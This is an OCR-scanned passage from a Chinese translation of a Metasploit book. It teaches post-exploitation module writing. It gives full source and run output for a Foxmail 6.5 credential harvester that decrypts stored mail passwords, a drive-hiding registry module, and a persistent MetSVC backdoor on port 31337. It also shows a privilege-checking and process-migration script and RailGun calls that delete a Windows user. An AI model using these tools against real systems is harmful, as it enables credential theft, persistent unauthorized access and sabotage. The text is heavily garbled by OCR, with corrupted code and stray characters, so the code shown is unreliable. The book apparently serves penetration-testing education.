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从 上 图 可 以 看 到 这 里 有 两 个 硬盘 , 即 C 盘 和 也 盘 。 另 外 我 们 还 需要 检查 注册 表 项 ， 并 为 要 使 用 的 


模块 创建 新 的 注册 表 键 。 






























































8f Registry Editor l-b m x | 
File Edit View Favorites Help 
l. PnPSysprep ^ || Name Type Data 
4|. Policies| ab) (Default) REG SZ (value not set) 
DE Attachments 
Ll. NonEnum =] 
J. System = 
I. PreviewHandlers 
4| [rmi à; —À 上 <| n 上 
ComputenHKEY LOCAL MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies 
不 过 我 们 还 没有 获得 开启 宝藏 的 钥匙 ， 下 面 运行 这 个 模块 ， 过 程 如 下 所 示 。 
msf > use post/masteringmetasploit/drive disable 
msf post(drive disable) > show options 
Module options (post/masteringmetasploit/drive disable): 
Name Current Setting Required Description 
DriveName E yes Please SET the Drive Letter 
SESSION 1 yes The session to run this module on. 


msf post(drive disable) > set SESSION 2 
SESSION => 2 
msf post(drive disable) > run 


[-] Key Doesn't Exist, Creating Key! 
Hiding Drive 
Restricting Access to the Drive 
Disabled E Drive 

[*] Post module execution completed 

msf post(drive disable) > J 




















当 我 们 的 模块 执行 之 后 ， 屏 幕 上 显示 “Key Doesn't Exist! Creating Key!" ( “该 键 值 不 存在 ， 正 在 
创建 中 ”)， 这 表明 该 模块 已 经 将 键 值 写 人 了 注册 表 。 我 们 再 来 查看 一 下 注册 表 : 












































gy Registry Editor l-o m 
File Edit View Favorites Help 
|. PnPSysprep * || Name Type Data 
4 |. Policies aU) (Default) REG SZ (value not set) 
J Attachments $8)NoDrives REG DWORD 0x00000010 (16) 
«|. Explorer, [E| s] NoViewOnDrives | REG DWORD 0x00000010 (16) 
J. NonEnum F1 
b «Lb. System = 
4 | n : — 上 4 | " 上 











ComputenHKEY LOCAL MACHINEASOFTWAREMicrosoftWindowsXCurrentVersionVPoliciesVExplorer 














可 以 看 到 这 个 键 已 经 存在 了 。 注 销 当前 的 用 户 ， 然 后 重新 登录 ， 





我 们 来 验证 一 下 。 





你 会 发 现 E 盘 已 经 不 见 了 。 


P ri 
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-beks 
gO- » Computer » -| 好 | Search Computer 5| 
Organize * System properties — » 5z >. Ci e 
4 4 Favorites 4 Hard Disk Drives (1) 

WI Desktop Local Disk (C) 
I$ Downloads 





€. Recent Places R 296GB free of 370 GB 


4 Devices with Removable Storage (1) 


L3 


司 Libraries 


> /5, Documents ha DVD Drive (D:) 
> eÈ Music T 

> Æ Pictures 

> a Videos 


> À Network 


WIN-6FO9IRT3265 Workgroup: WORKGROUP 
A Processor: Intel(R) Core(TM) i7-4710HQ CPU... 


























现在 已 经 没有 卫 盘 了 。 我 们 已 经 成 功 从 用 户 视野 中 隐藏 了 己 盘 ， 同 时 用 户 也 无 法 访问 它 了 。 

现在 想 要 儿 个 后 渗透 模块 ， 就 可 以 创建 几 个 了 。 建 议 你 在 Metasploit 库 的 研究 上 多 花 一 些 时 间 。 

首先 要 确保 你 已 经 获得 了 系统 级 的 访问 权限 来 执行 上 面 的 代码 。 这 是 因为 系统 级 的 访问 权限 将 会 
在 目标 系统 上 创建 注册 表 项 ， 而 不 是 仅仅 在 当前 用 户 上 创建 注册 表 项 。 另 外 ,我们 使 用 HKLM 而 不 是 


HKEY LOCAL MACHINE 是 因为 系统 内 置 的 标准 化 模块 会 自动 创建 完整 形式 的 键 。 建 议 你 仔细 阅读 
registry.rb 文件 ， 查 看 其 中 可 用 的 各 种 方法 。 





















































如 果 你 没有 系统 级 管理 权限 ,可 以 尝试 使 用 exploit/windows/local/bypassuac 
模块 ， 然 后 执行 提升 权限 命令 (getsystem )， 之 后 再 执行 前 面 的 模块 。 


2.2.7 ”编写 一 个 收集 登录 凭证 的 后 渗透 模块 


在 这 个 示例 模块 中 ,我 们 攻击 的 目标 是 Foxmail 6.5。 我 们 将 尝试 对 登录 凭证 进行 解密 ， 然 后 将 它 
保存 到 数据 库 中 。 下 面 给 出 了 具体 实现 的 代码 : 


class MetasploitModule < Msf::Post 
include Msf::Post::Windows::Registry 
include Msf::Post::File 
include Msf::Auxiliary::Report 
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include Msf::Post::Windows::UserProfiles 


def initialize(info-()) 
super(update info(info, 
'Name' -» 'FoxMail 6.5 Credential Harvester', 
'Description' => %q{ 
This Module Finds and Decrypts Stored Foxmail 6.5 Credentials 
s 


'License' -» MSF LICENSE, 
'Author' -» ['Nipun Jaswal'], 
'Platform' -» [ 'win' ], 
'SessionTypes' => [ 'Meterpreter' | 


) ) 


end 
上 面 模块 中 给 出 的 代码 十 分 简单 ， 仍 然 是 先导 入 所 有 需要 的 库 文 件 ， 再 给 出 关于 这 个 模块 的 基本 
信息 。 
我 们 之 前 已 经 学 习 过 了 Msf::Post::Windows::Registry 和 Msf::Auxiliary::Report 的 


用 法 ， 下 面 给 出 了 本 例 中 新 出 现 一 些 库 文件 的 介绍 。 









































引入 语句 路 € 用 途 
Msf::Post::Windows::UserProfiles  lib/msf/core/post/windows/user profiles.rb 提供 了 Windows 系 
统 的 所 有 配置 文 
件 ， 包 括 对 重要 目 
录 和 路 径 的 查找 
Msf::Post::File lib/msf/core/post/file.rb 提供 了 各 种 操作 文 


件 的 函数 ， 例 如 文 
件 读 取 、 目 录 检 查 、 
目录 列举 、 文 件 写 


入 等 

















在 开始 学 习 模 块 的 下 一 部 分 前 ， 先 来 了 解 一 下 收集 登录 凭证 的 整个 过 程 。 

(1) 首先 搜索 用 户 文件 ， 查 找 当 前 用 户 的 LocalAppData 文件 夹 的 准确 位 置 。 

(2) 使 用 上 面 找到 的 位 置 ， 并 将 其 与 \VirtualStore\Program Files (x86)\Tencent\Foxmail\mail 连 
接 ， 建 立 一 个 mail 文件 夹 的 完整 路 径 。 

(3) 列 出 mail 文件 夹 下 的 所 有 文件 来， 并 将 它们 都 保存 到 一 个 数组 中 。 在 mail 文件 中 的 每 一 
个 文件 夹 的 名 字 都 对 应 着 一 个 邮箱 用 户 名 ， 比 如 nipunjaswal@rocketmail.com 就 可 以 是 mail 文 件 夹 
下 的 一 个 文件 夹 。 

(4) 在 mail 文件 夹 下 的 accounts 文件 夹 中 查找 Account.stg 文件 。 

(5) 通过 读 取 Account.stg 文件 ， 会 发 现 名 为 POP3Password 的 散 列 值 。 

(6) 将 这 个 值 传递 给 解密 方法 ， 然 后 就 会 得 到 明文 密码 。 

(7) 将 这 些 值 保存 到 数据 库 中 。 


怎么 样 ， 很 简单 吧 。 下 面 对 代 码 进行 分 析 : 



































































































































这 
这 


























2.2 开发 自 定义 模块 T] 





def run 
profile - grab user profiles() 
counter - 0 


data entry - "" 
profile.each do luser| 
if user['LocalAppData'] 
full, path - user['LocalAppData'] 
full path = full path+"\\VirtualStore\\Program Files 
(x86) \\Tencent \\Foxmail\\mail" 
if directory? (full_path) 
print_good("Fox Mail Installed, Enumerating Mail Accounts") 
session.fs.dir.foreach(full path) do ldir list| 
if dir list -- /@/ 
counter-counter-«1l 
full path mail = full _ path+ "M" + dir list + "\" + "Account.stg" 
if file?(full, path, mail) 
print good("Reading Mail Account #{counter}") 
file content - read file(full path mail).split("n") 


在 分 析 上 述 代码 之 前 ， 先 来 看 看 代码 中 都 使 用 了 哪些 重要 的 函数 ， 以 便 更 好 地 了 解 这 些 代 码 。 









































ER 数 E x f 用 途 

grab user profiles() lib/msf/core/post/windows/user profiles.rb 在 Windows 系统 平台 上 抓 取 所 有 
重要 目录 的 路 径 

directory? lib/msf/core/post/file.rb 检查 一 个 指定 的 目录 是 否 存在 

file? lib/msf/core/post/file.rb 检查 一 个 指定 的 文件 是 否 存 在 

read file lib/msf/core/post/file.rb 读 取 一 个 文件 的 内 容 

store loot /lib/msf/core/auxiliary/report.rb 将 收集 到 的 信息 保存 到 一 个 文件 
和 数据 库 中 

















从 上 面 的 代码 中 可 以 看 出 ,我 们 使 用 grapb_user_profiles() 抓 取 了 配置 文件 ， 并 尝试 寻找 每 
个 文件 的 LocalAppData 文件 夹 。 一 旦 找到 ， 就 将 它 保 存在 一 个 名 为 full path 的 变量 中 。 


接 下 来 将 这 个 路 径 与 mail 文件 夹 组 合 , 在 mail 文件 夹 中 所 有 的 用 户 名 都 以 子 文件 夹 名 形式 展现 。 
可 以 使 用 airectory? 方 法 检查 该 文件 夹 是 否 存在 。 一 旦 成 功 ， 就 使 用 正则 表达 式 将 所 有 包含 e 字 符 
的 文件 夹 名 保存 到 dir list 中 。 接 下 来 ， 创 建 另 一 个 变量 ful1_path_mail， 保 存 每 个 email 到 
Account.stg 的 准确 路 径 。 可 以 使 用 file? 方 法 来 查看 Accountstg 文件 是 否 存在 ; 如 果 存 在 , 则 读 取 这 
个 文件 , 然后 将 其 所 有 内 容 都 以 换行 符 分 隔 开 。 将 分 隔 后 的 内 容 保存 到 file_content 列表 , 下 面 给 

































































出 了 代码 的 其 他 部 分 。 
file content.each do lhash| 
if hash =~ /POP3Password/ 


hash data = hash.split("-") 

hash, value = hash data[1] 

if hash, value.nil? 

print error("No Saved Password") 

else 

print good("Decrypting Password for mail account: #{dir_ list)") 
decrypted pass - decrypt (hash value,dir list) 
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data, entry << "Username:" 
decrypted, pass-«"n" 

end 

end 

end 

end 

end 

end 

end 

end 

end 

store loot("Foxmail 
Accounts", 

end 


dir list + 


"text/plain",session,data entry,"Fox.txt", 


"t" + "Password:" + 





3E file content 中 的 每 一 个 条 目 都 进行 了 检查 ， 以 便 查找 其 中 的 PoP3Password, —H 
1 的 值 保存 到 变量 hash_value 中 





找到 这 样 的 字段 ， 利 用 = 对 这 个 字 


接 下 来 就 可 以 将 hash. value 和 


后 ， 明 文 密码 将 被 保存 到 变量 decrypt 





方法 将 aat a entry 变量 保存 到 数据 库 


段 进行 分 割 ， 并 将 其 





所 有 登录 凭证 都 添加 到 其 中 。 之 所 以 这 相 
因此 , 每 一 个 登录 凭证 的 结果 都 要 添加 到 aata_entry 中 。 当 所 有 操作 完成 以 后 , 使 用 store 1oot 
1。 我们 要 向 store 1oot 提供 6 个 参数 ， 分 别 是 收集 的 名 


做, 是 因为 我 人 




















ir list (HPZ ) 传递 给 函数 decry 





"Fox Mail Accounts") 

















o 


pt () 了。 成 功 解密 之 


ed, pass 中 。 再 创建 一 个 名 为 data entry 的 变量 ， 然 后 将 














门 并 不 知道 在 目标 上 一 共 





























称 、 内 容 类 型 session, data entry , 文件 的 名 称 以 及 收集 的 描述 。 

















下 面 给 出 了 解密 函数 的 具体 实现 : 








def decrypt (hash real,dir list) 


9, di, Lily lT0,- 1296] 


decoded = "" 

magic = Array[126, 100, 114, 
fc0 - 90 

size = (hash real.length)/2 - 1 
index - 0 

b - Array.new(size) 


for i in 0 .. size do 





b[i] = (hash real[index,2]).hex 
index = index«2 

end 

b[0] » b[0] ^ £cO 

double magic = magic-«magic 

d = Array.new(b.length-1) 

for i in 1 .. b.length-1 do 
d[i-1] = b[i] ^ double magic[i-1] 
end 

e - Array.new(d.length) 

for i in 0 .. d.length-1 

it (dir) - blil « 0) 

eli] es d[i] 4 255 = b[i] 

else 

e[i] » d[i] = b[1i] 

end 


decoded «« e[i].chr 








LC 置 了 多 少 邮 箱 账 户 。 
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end 

print good("Found Username #{dir_list} with Password: #{decoded}") 
return decoded 

end 

end 


上 面 的 方法 接收 了 两 个 参数 ， 分 别 是 密码 的 散 列 值 和 用 户 名 。 变 量 magic 是 解密 密 铀 ， 存 储 为 | 








数组 的 形式 ， 数 组 中 的 内 容 依次 是 字符 串 ~araGon~ 的 10 进 制 数字 表示 。 将 整数 90 保存 在 fc0 中 ， 











会 再 解释 这 








么 做 的 原因 。 

















接 下 来 ， 通 过 将 散 列 值 除 以 2 并 从 中 减 去 1 来 得 出 它 的 长 度 ， 这 个 长 度 也 是 新 创建 的 数组 b 的 
































长 度 。 
在 下 一 步 中 
第 一 个 字 节 与 


将 散 列 值 分 成 字 节 【每 次 两 个 字符 )， 然 后 将 它们 存储 到 数组 o 























。 对 数组 b da 


fc0 进行 xon 操作 ， laue 结果 保存 到 数组 b 的 第 一 个 字 节 处 。 因 此 , 通过 与 90 进 
ÍT XOR 操作 可 以 更 新 bf[0] 的 值 。 这 一 点 对 Foxmail 6.5 也 适用 。 


现在 复制 magic 数组 两 次 ， 生 成 一 个 新 的 数组 aouble_magic。 声 明 double magic 数组 的 长 
度 比 数组 b 的 长 度 短 1。 对 除数 组 b 中 的 第 一 个 元 素 以 外 的 所 有 元 素 与 数组 double_magic 中 的 所 有 
元 素 执行 XOR 操作 。 注 意 ， 不 对 数组 b 中 的 第 一 个 已 经 执行 过 XOR 运算 的 元 素 进行 这 


将 XOR 的 结果 保存 到 数组 a 中 。 下 一 条 指令 从 数组 b 中 减 去 数组 a 的 内 容 ， 但 当 相 减 的 结果 小 





























Tom, T 


加 255. 





文 个 操作 。 


下 一 步 需 要 将 数组 e 中 特定 元 素 的 ASCII 值 添加 到 aecoaea 变量 中 ， 并 将 其 返回 到 调用 语句 中 。 








下 面 给 出 


了 这 个 模块 的 运行 界 画 
fsf > use post/windows/gather/credentials/foxmail 











o 





msf post(foxmail) > set SESSION 2 
SESSION => 2 
msf post(foxmail) > run 


Fox Mail Installed, Enumerating Mail Accounts 
Reading Mail Account 1 
Decrypting Password for mail account: dum.yum2014@gmail.com 
Found Username dum.yum2014@gmail.com with Password: Yum@12345 
Reading Mail Account 2 
Decrypting Password for mail account: isdeeepllive.com 
Found Username isdeeepüélive.com with Password: Metasploit68143 
[*] Post module execution completed 
msf post(foxmail) > sessions -i 2 
[*] Starting interaction with 2... 


Imeterpreter > Sysinfo 





Computer : DESKTOP-PESQ21S 

los : Windows 10 (Build 10586). 
Architecture : x64 (Current Process is WOW64) 
System Language : en US 

Domain : WORKGROUP 

Logged On Users : 2 

Meterpreter : x86/win32 








很 明显 ， 我 们 可 以 轻松 地 对 存储 在 Foxmail 6.5 中 的 登录 凭证 进行 解密 了 。 
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2.3 ”突破 Meterpreter 脚本 


在 目标 计算 机 上 获得 一 个 Meterpreter 命令 行 控制 权限 是 每 一 个 攻击 者 都 梦 条 以 求 的 。Meterpreter 
可 以 向 攻击 者 提供 用 于 在 被 渗透 计算 机 上 完成 各 种 任务 的 各 种 工具 。 除 此 之 外 ，Meterpreter 还 有 很 多 内 
置 的 脚本 可 以 使 用 ， 这 使 得 攻击 者 可 以 更 轻松 地 攻击 系统 。 这 些 脚 本 可 以 在 被 渗透 的 计算 机 上 执行 或 
简单 或 复杂 的 任务 。 在 本 节 中 ， 可 以 看 到 这 些 脚本 的 组 成 部 分 以 及 如 何在 Meterpreter 中 利用 这 些 脚 本 。 





Hu 


















































从 以 下 网 页 可 获得 Meterpreter 的 基本 命令 速 查 表 : http://scadahacker.com/library/ 
Documents/Cheat Sheets/Hacking%20-%20Meterpreter%20Cheat%20%20Sheet.pdf。 


2.3.1 Meterpreter 脚本 的 要 点 


到 目前 为 止 ， 我 们 已 经 见识 了 Meterpreter 的 威力 。 当 需要 在 目标 系统 执行 指定 任务 时 ， 都 可 以 通 
过 Meterpreter 实现 。 然 而 在 进行 渗透 测试 时 ， 可 能 会 出 现 一 些 特殊 的 需求 ， 往 往 Meterpreter 中 现 有 的 
模块 并 不 具备 这 些 功能 。 在 这 种 情况 下 , 我 们 希望 将 能 够 完成 任务 的 自 定义 功能 模块 添加 到 Meterpreter 
中 。 我 们 先 来 执行 一 下 Meterpreter 的 高 级 功能 ， 领 略 一 下 它 的 威力 。 








2.3.2 ”设置 永久 访问 权限 


当 获 得 了 目标 计算 机 的 控制 权限 之 后 ,我 们 就 可 以 借 此 来 侵入 到 内 部 网 络 ， 就 像 在 前 一 章 中 做 的 
那样 ， 同 时 我 们 必须 保持 好 这 来 之 不 易 的 控制 权限 。 不 过 对 于 授权 的 渗透 测试 ， 只 有 在 许可 的 时 间 和 
范围 内 才 需 要 实现 控制 权限 的 持久 化 。 利 用 Meterpreter， 可 以 通过 MetSVC 和 Persistence 两 种 不 同 的 
方法 在 目标 计算 机 上 安装 后 门 程序 。 

我 们 将 在 接 下 来 的 章节 中 看 到 一 些 高 级 的 永久 访问 权限 。 因 此 ,这 里 将 讨论 MetSVC 方 法 -MetSVC 

安装 在 被 成 功 渗透 的 目标 主机 上 , 然后 以 系统 服务 形式 运行 。 而 且 MetSVC 会 打开 目标 主机 的 一 个 端 

口 ， 这 个 端口 将 会 永久 性 地 向 攻击 者 开放 。 只 要 攻击 者 愿意 ， 就 可 以 在 任何 时 候 连 接 到 目标 主机 上 。 
在 目标 计算 机 上 安装 MetSVC 是 一 个 很 简单 的 工作 ,来 看 看 如 何 完成 这 个 任务 。 



























































meterpreter > run metsvc -A 
*] Creating a meterpreter service on port 31337 
*] Creating a temporary installation directory C: WINDOWSXTEMPNbPYQYuXAbCWKLOM . 


[*] »» Uploading metsrv.dll... 
[*] >> Uploading metsvc-server.exe... 
[*] >> Uploading metsvc.exe... 
[*] Starting the service... 
* Installing service metsvc 
* Starting service 
Service metsvc successfully installed. 


[*] Trying to connect to the Meterpreter service at 192.168.75.130:31337... 


meterpreter > [+] Meterpreter session 2 opened (192.168.75.138:41542 -> 192.168. 
75.130:31337) at 2013-09-17 21:07:31 +0000 


可 以 看 到 MetSVC 在 31337 端口 创建 了 一 个 服务 ， 然 后 上 传 了 一 个 恶意 的 软件 到 目标 计算 机 。 
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今后 ， 每 当 需 要 访问 该 服务 ， 我 们 只 需要 打开 exploitmultihandler， 将 攻击 载荷 设置 为 metsvc_ 
binq_tcp， 就 能 够 再 次 连接 到 服务 。 这 一 切 如 下 面 的 屏幕 截图 所 示 。 
































msf > use exploit/multi/handler 


msf  exploit(handler) > set payload windows/metsvc bind tcp 

payload -» windows/metsvc bind tcp 

msf  exploit(handler) > set RHOST 192.168.75.130 

RHOST => 192.168.75.130 

msf exploit(handler) > set LPORT 31337 
LPORT => 31337 

msf  exploit(handler) > exploit 





[*] Starting the payload handler... 
[*] Started bind handler 
[*] Meterpreter session 3 opened (192.168.75.138:42455 -» 192.168.75.130:31337) 











meterpreter > 











即使 目标 主机 重新 启动 了 , MetSVC 的 效果 仍然 存在 。 当 需要 永久 地 获得 目标 主机 的 控制 权限 时 ， 
MetSVC 是 十 分 方便 的 ， 它 也 节省 了 再 次 渗透 攻击 的 时 间 。 








2.8.8 API 调用 和 mixin 类 





我 们 刚刚 见识 了 Meterpreter 的 高 级 功能 ， 这 些 功能 确实 使 渗透 测试 工程 师 的 工作 轻松 了 很 多 。 

现在 让 我 们 深入 研究 Meterpreter 的 工作 机 制 , 揭示 Meterpreter 模块 和 脚本 的 基本 创建 过 程 。 这 是 
因为 有 些 时候 仅 仅 使 用 Meterpreter 可 能 完成 不 了 所 有 的 指定 任务 。 在 这 种 情形 下 ， 就 需要 开发 自 定 义 
模块 去 执行 或 者 自动 化 渗透 攻击 阶段 的 各 种 任务 。 

首先 来 了 解 一 下 Meterpreter 脚本 的 基础 知识 。Meterpreter 编程 的 基础 就 是 应 用 编程 接口 (application 
programming interface, API ) 调用 和 mixin 类 。 在 需要 调用 Windows 动态 链接 库 (dynamic link library , 
DLL ) 文件 或 者 调用 一 些 Ruby 编写 的 模块 时 ， 这 两 者 是 必 不 可 少 的 。 

mixin 是 Ruby 编程 语言 中 的 一 个 基础 类 。 这 个 类 包含 了 其 他 类 的 各 种 方法 。 当 我 们 试图 在 目标 计 
算 机 上 完成 各 种 任务 时 ，mixin 是 极其 有 用 的 。 除 此 以 外 ，mixin 并 不 完全 是 IRB 的 一 部 分 , 但 是 它 可 
以 帮助 你 轻松 编写 更 具体 、 更 先进 的 Meterpreter 脚本 。 














































































































有 关 mixin 的 更 多 信息 ,请 访问 http://www.offensive-security.com/Metasploit-unleashed/ 
Mixins and Plugins, 





建议 你 在 /lib/rex/post/Meterpreter fIl/lib/msf/scripts/Meterpreter 目录 中 详细 了 解 Meterpreter 所 使 月 
的 各 种 库 文件 。 


API 调用 指 的 是 在 Windows 系统 下 从 DLL 文件 中 调用 指定 的 功能 。2.4 节 将 学 习 API 调用。 
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2.3.4 制作 自 定 义 Meterpreter 脚本 


先 来 完成 一 个 简单 的 Meterpreter 脚本 实例 , 这 个 脚本 将 会 检查 我 们 当前 是 否 为 管理 员 用 户 , 然后 
找到 explorer 进程 ， 并 自动 迁移 到 这 个 进程 中 。 
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在 开始 编写 之 前 ， 先 来 了 解 一 些 即 将 使 用 到 的 重要 函数 。 


函数 





库 x 件 





is admin 
is in admin group 


session. SyS.process. 


get processes() 


session.core.migrate() 


is uac, enabled? 


get uac, level 


来 看 看 下 面 的 代码 : 


/lib/msf/core/post/windows/priv.rb 
/lib/msf/core/post/windows/priv.rb 


/lib/rex/post/ 
stdapi/sys/process.rb 


eterpreter/extensions/ 


/lib/rex/post/ 


core.rb 


eterpreter/client . 


/lib/msf/core/post/windows/priv.rb 





/lib/msf/core/post/windows/priv.rb 


t 检查 当前 用 户 是 否 为 管理 员 


print status("Checking If the Current User is Admin") 
is admin? 


admin check - 
if(admin, check) 


print good("Current User Is Admin") 


else 


print error("Current User is Not Admin") 


end 





上 面 的 代码 用 来 检查 当前 用 户 是 否 为 管理 员 。 这 里 函数 is admin 的 返回 值 为 布尔 类 型 ， 我 们 可 











以 打印 输出 这 个 结果 : 

















# 检查 用 户 是 否 属 于 管理 员 组 


user_check = 
if(user check) 


is in admin group? 


print good("Current User is in the Admin Group") 


else 


print error("Current User is 


end 








上 面 这 段 代 码 检查 了 


























户 是 否 








三 


# Explorer.exe 的 进程 ID 


current pid = 


Session.sys.process.getpid 


print status("Current PID is &(current pid)") 


Session.sys.process.get processes().each do 
if x['name'].downcase -- 


Ix| 
"explorer.exe" 


ot in the Admin Group") 


A B 
E 

















检查 当前 会 话 是 否 具 有 管理 员 权限 
A 


检查 一 个 用 户 是 否 属于 管理 员 组 


























列 出 目标 系统 中 当前 运行 的 所 有 进程 








将 控制 程序 从 当前 进程 转移 到 由 参数 
指定 的 PID 所 代表 的 进程 上 





















































检查 UAC 是 否 启用 
获得 UAC 的 值 0、2、5 等 
0: 未 启用 

2: 全 部 

5: 默认 








于 管理 员 组 。 这 段 代 码 的 逻辑 和 前 一 段 十 分 类 似 。 


print good("Explorer.exe Process is Running with PID £$(x['pid'])") 


explorer ppid - 


xqp'prd:!l.to 


# 迁移 到 Explorer.exe 进程 
Session.core.migrate(explorer. ppid) 


current pid - 


Session.sys.process.getpid 


print status("Current PID is &(current pid)") 


end 
end 


2.3 ”突破 Meterpreter 脚本 83 





这 部 分 代码 的 作用 十 分 重要 。 我 们 首先 使 用 session.sys.process.getpia 查找 当前 进程 ID ， 
然后 使 用 session.sys.process.get_processes () 上 的 循环 遍历 目标 系统 上 的 所 有 进程 。 如 果 找 
到 名 称 为 explorer .exe 的 进程 , 我 们 将 打印 一 条 消息 , 并 将 其 ID 存储 到 变量 explorer_ppia 中 。 
使 用 session.core.migrate() 方 法 将 存储 的 进程 ID (explorer.exe ) 迁 移 到 explorer.exe 进 
程 中 。 最 后 ， 只 需 再 次 打印 当前 进程 ID ， 以 确保 是 否 成 功 迁 移 。 


# 查找 当前 用 户 

print status("Getting the Current User ID") 
currentuid = session.sys.config.getuid 

print good("Current Process ID is f$(currentuid)") 


在 上 面 这 段 代码 中 ， 我 们 使 用 sessions .sys.config.getuid 方法 查找 当前 用 户 的 标识 符 : 


检查 目标 系统 上 是 否 启 用 了 UAC 
uac_check = is_uac_enabled? 
if (uac, check) 


























zt 
print error("UAC is Enabled") 
uac, level = get, uac, level 
if(uac level - 5) 

print status("UAC level is $(uac level.to s) which is Default") 
elsif (uac level - 2) 


print status("UAC level is £(uac level.to s) which is Always Notify") 


print error("Some Error Occured") 











print good("UAC is Disabled") 

















上 面 的 代码 检查 了 目标 系统 上 是 否 启用 了 UAC。 如 果 启 用 了 UAC, 我 们 将 使 用 get -uac-level 
方法 进一步 深入 查找 UAC 的 级 别 ， 并 通过 其 响应 值 打印 状态 。 


让 我 们 将 此 代码 保存 在 /scripts/meterpreter/gather.rb 目录 中 ， 并 在 Meterpreter 中 启动 此 脚本 。 执 行 
完毕 后 将 出 现 类 似 以 下 屏幕 截图 的 输出 。 









































[*] Checking If the Current User is Admin 
[-] Current User is Not Admin 
Current User is in the Admin Group 
[*] Current PID is 2836 
Explorer.exe Process is Running with PID 2064 
*] Current PID is 2064 
] Getting the Current User ID 
Current User ID is WIN-G2FTBHAP178MApex 
[-] UAC is Enabled 
[*] UAC level is 5 which is Default 


现在 我 们 清楚 地 了 解 到 ,无 论 是 编写 Meterpreter 脚本 ， 执 行 各 种 任务 ， 还 是 实现 任务 的 自动 化 ,这 
一 切 都 是 那么 简单 。 建 议 你 仔细 研究 模块 中 引入 的 文件 和 路 径 ， 以 便 更 深入 地 了 解 Meterpreter。 


根据 Metasploit 在 维基 百科 上 的 介绍 ， 你 不 该 再 去 编写 Meterpreter 脚本 ， 而 是 应 该 
编写 一 些 后 渗透 模块 。 
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2.4 与 RailGun 协同 工作 


RailGun 听 起 来 好 像 是 一 种 电磁 轨道 雹 。 然 而 , 它 并 非 这 个 意思 。RailGun 允许 你 在 不 编译 自己 的 
DLL 文件 的 情况 下 直接 调用 Windows 的 API。 

它 支 持 数 目 众多 的 Windows DLL 文件 ， 并 且 为 攻击 者 在 目标 计算 机 上 获得 系统 级 权限 提供 了 便 
利 的 途径 。 让 我 们 看 看 如 何 使 用 RailGun 执行 各 种 任务 ， 以 及 如 何 使 用 它 去 完成 一 些 高 级 的 后 渗透 攻 
击 工作 。 






















































































2.4.1 ZER Ruby 命令 行 基础 


在 使 用 RailGun 之 前 ， 需 要 先 在 Meterpreter 命令 行 中 载 人 iro 命令 行 。 下 
Meterpreter 命令 行 切换 到 iro 命令 行 。 























页 








演示 了 如 何 从 














meterpreter > irb 
[*] Starting IRB shell 
[*] The 'client' variable holds the meterpreter client 


>> 2 

2-2 

»» print("Hi") 
Hi-» nil 

>l 




















在 上 图 中 可 以 看 到 , 简单 地 输入 irp 就 可 以 从 Meterpreter 命令 行 切换 到 交互 式 Ruby 命令 行 。 可 
以 通过 Ruby 命令 行 执行 各 种 任务 。 








2.4.2 了 解 RailGun 及 其 脚本 编写 
RailGun 具有 极为 强大 的 能 力 。 有 些 任务 Metasploit 不 能 胜任 ，RailGun 却 可 以 顺利 完成 。 可 以 通 
过 RailGun 使 得 目标 系统 的 DLL 文件 出 现 更 多 的 异常 ， 并 且 创造 出 更 先进 的 后 渗透 方法 。 
现在 来 看 看 如 何 通 过 RailGun 在 一 个 方法 中 调用 基础 API， 以 及 它 是 如 何 工 作 的 。 


client.railgun.DLLname.function(parameters) 

这 是 在 RailGun 中 调用 API 的 基本 结构 。 关 键 字 client.railgun 定义 了 我 们 需要 客户 端的 
RailGun 功能 。 关 键 字 DLLname 指明 了 在 执行 一 个 DLL 文件 调用 时 要 使 用 的 DLL 名 称 。 关 键 字 
function (parameters) 指 定 需要 从 DLL 文件 中 调用 的 API 函数 作为 参数 。 


来 看 一 个 例子 。 





















































meterpreter > irb 
[*] Starting IRB shell 
[*] The 'client' variable holds the meterpreter client 


>> client.railgun.user32.LockWorkStation() 
=> ("GetLastError"-»0, "ErrorMessage"-»"The operation completed successfully.", "return"-»true] 
>> 
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这 个 API 调 用 执行 的 结果 如 下 图 所 示 。 





i. Windows 7 Horne Basic 





接着 ， 我 们 来 看 看 这 个 API 的 调用 方法 以 及 它 的 参数 使 用 。 
client.railgun.netapi32.NetUserDel (arg1,agr2) 


当前 的 命令 一 旦 运行 ， 将 会 从 客户 的 计算 机 上 删除 指定 的 用 户 。 目 前 有 以 下 用 户 。 








i. Windows / Home Basic 





zy PS 
S 


又 会 员 ChenyangGao(23390835109)qq.com) 专 享 尊重 版 权 








图 灵 社 
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来 试 试 删除 一 个 用 户 名 为 Nipun 的 用 户 。 





>> client.railgun.netapi32.NetUserDel (nil,"Nipun") 
=> {"GetLastError"=>997, "ErrorMessage"=>"FormatMessage failed to retrieve the error.", "return"=>0} 


>> 目 
检查 一 下 用 户 是 否 被 成 功 删 除 。 


























FT 


| 


Apex 
Logged on 





成 功 搞定 ! 这 个 用 户 已 经 消失 了 。RailGun 已 经 成 功 将 用 户 Nipun 从 系统 中 删除 了 。 值 nil 指明 
了 用 户 是 工作 在 局 域 网 中 。 然 而 ， 如 果 系 统 的 目标 在 一 个 不 同 的 网 络 中 ,， 则 应 该 把 参数 的 值 设 定 为 目 
标 系统 的 NET-BIOS 值 。 


2.4.8 控制 Windows 中 的 API 调用 


在 Windows 系统 中 ，DLL 文件 是 大 多 数 任务 能 否 顺利 完成 的 关键 。 因 此 ， 重 中 之 重 就 是 明确 哪 
个 DLL 文件 中 包含 了 哪个 方法 。 与 Metasploit 的 库 文件 类 似 ， 它 也 包含 了 很 多 方法 。 如 果 想 学 习 
Windows API 调用， 可 以 访问 http:/source.winehq.org/WineAPI 和 http://msdn.microsoft.com/en-us/library/ 
windows/desktop/ff818516(v=vs.85).aspx， 其 中 有 许多 优秀 的 学 习 资 料 。 建 议 在 深入 学 习 RailGun 脚本 
的 创建 之 前 ， 先 多 熟悉 一 下 各 种 API 调用 。 


有 关 RailGun 支持 的 DLL 文件 的 更 多 信息 ， 请 参考 以 下 路 径 : /usr/share/Metasploit- 
framework/lib/rex/post/Meterpreter/extensions/stdapi/RailGun/def., 






































2.4.4 构建 复杂 的 RailGun 脚本 


现在 开始 更 深入 地 学 习 使 用 RailGun 来 编写 Meterpreter 的 扩展 模块 。 首 先 创建 一 个 脚本 ， 这 个 脚 
本 会 将 一 个 自 定义 名 称 的 DLL 文件 添加 到 Metasploit 的 界面 中 。 
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if client.railgun.get dll('urlmon') -- nil 
print status("Adding Function") 
end 


client.railgun.add dll('urlmon','C: NWINDOWSNsystem32Nurlmon.dll') 
